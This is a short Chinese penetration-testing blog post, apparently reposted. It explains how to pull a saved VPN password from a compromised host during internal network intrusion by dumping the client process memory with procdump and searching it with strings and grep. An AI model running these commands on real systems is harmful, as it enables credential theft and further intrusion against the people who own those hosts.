可領全套安全課程、配套攻防靶場

<code>本文僅限技術研究與討論，嚴禁用於非法用途，否則產生的一切後果自行承擔。/<code>

序言

學習到的姿勢，分享出來，手法也很基礎，請各位師傅多多指教。

測試

<strong>VPN

一般情況下，我們進行內網滲透過程中獲取到管理員或者其他目標主機時多數情況會遇到主機中存在VPN連接客戶端並大多數都是保存密碼，如圖：

<strong>星號查看器

此時獲取目標時一般情況下會想到星號查看器，但是由於客戶端做了防護，無法用星號查看器獲取到內容，如圖：

<strong>密碼獲取

發現當Client端當用戶密碼錯誤時會出現在內存中，我們可以將正確的密碼後面加個字符（如：$）

然後我們將Client進程的內存進行dump，這裡使用procdump，然後strings一下

<code># 需提前查看Client的PID或者直接使用Client進程名稱procdump64.exe -accepteula -ma 14256 vpn.dmp/<code>

<code>strings vpn.dmp | grep -F 'PIN:' -A 6/<code>

<strong>寫到最後

以上測試過程純屬本人杜撰，請遵守《網絡安全法》等相關法律法規。

轉載自：https://xz.aliyun.com/t/7102

今天你知道了嗎

加群，黑客技術大咖在線解答(群號評論區見)

閱讀更多 暗網視界 的文章

關鍵字: 查看器 黑客 獲取